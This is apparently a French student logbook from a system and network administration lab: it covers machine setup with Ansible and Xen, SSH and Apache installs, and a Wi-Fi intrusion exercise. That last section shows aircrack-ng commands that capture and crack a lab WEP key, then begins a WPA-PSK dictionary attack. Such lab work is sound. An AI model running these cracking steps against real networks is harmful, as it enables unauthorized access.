TP sysres IMA5 2022/2023 G3
30/09 Séance 1:
- Installation nouveau OS sur zabeth15 :
- Boot sur clef USB, configuration du réseau etc ...
- Utilisation de Ansible pour paramètrer les machines et y installer les packages :
Tous ensemble création des clef publique Notre groupe s'est ensuite occupé de mettre à jour la date, la langue, etc ... sur toutes les machines présentes dans /etc/ansible/hosts à l'aide de la fonctionalité de rôle proposé par ansible
13/09 Séance 2:
- Installation nouveau OS sur zabeth06
- Installation JVM sur capbreton à l'aide de la commande :
xen-create-image --ip=193.48.57.103 --gateway=193.48.57.161 --netmask=255.255.255.0 --hostname=dio3 --dist=chimaera --dir=/usr/local/xen/
Sommaire
Création du nom de domaine
Sur Gandi.net nous avons choisi un nom de domaine pour notre futur site web :
fonduesavoyarde.site
puis nous avons depuis notre VM entré la commande openssl permettant de récupérer le certificat :
openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr -utf8
Branchement et configuration SR-52
En SR-52 nous avons branchés 2 câbles entre le routeur et la baie de brassage, puis nous avons configuré le routeur cisco pour mettre les 2 interfaces correspondant à nos branchement dans le VLAN 531
SSH
On installe tout d'abord les packages :
apt install systemctl apt install openssh-client apt install openssh-server
On redémarre ssh :
systemctl restart sshd.service
Apache
On installe les packages :
apt install apache2
Connection IPV4
Dans /etc/network/interfaces, nous avons modifié les valeurs d'adresse, de gateway et du netmask avec les valeurs indiquées sur la page d'accueil du wiki Ensuite il a fallu changé la valeur du bridge dans le dio3.cfg en mettant IMA5sc
On a redemarré la vm
xen shutdown dio3 xen create dio3.cfg
Pour tester le bon fonctionnement, on a pu essayer de ping google et les autres dio
ping google.com ping 193.48.57.183
Test d'intrusion
WEP
Installation du paquetage aircrack-ng
airmon-ng airmon-ng start wlan0mon
On écoute les trames Wi-Fi et on repère l'ESSID de notre groupe, nous prenons donc cracotte03 :
airodump-ng --encrypt wep wlan0mon
On récupère notre BSSID : 04:DA:D2:9C:50:52
On focalise notre écoute sur ce point d'accès et on récupère un certains nombre de packet pour pouvoir ensuite procéder au crack de la clef WEP:
airodump-ng -c 13 --bssid 04:DA:D2:9C:50:52 -w cracotte03 wlan0mon
On peut en parrallèle lancer le crack (et relancer si pas assez de donnée) pendant que l'écoute précédente s'effectue :
aircrack-ng cracotte03-01.cap
(Nom du fichier qui se crée et se met à jour avec la commande précédente, à vérifier si il porte le même nom)
On obtient un résultat après 36344 IVs :
WPA
On commence par créer un dictionnaire contenant toutes les chaînes de caractères possible contenant 8 chiffres :
On écoute cette fois-ci les trames Wi-Fi sécurisées en WPA-PSK :
airodump-ng --encrypt wpa2 wlan0mon
On récupère notre BSSID : 44:AD:D9:5F:87:02
On focalise notre écoute sur ce point d'accès et on récupère un certains nombre de packet pour pouvoir ensuite procéder au crack de la clef WPA-PSK:
On découpe notre dictionnaire en N parties de même tailles, on lance ensuite la résolution sur N zabeth en parallèle afin d'avoir un temps plus rapide de réponse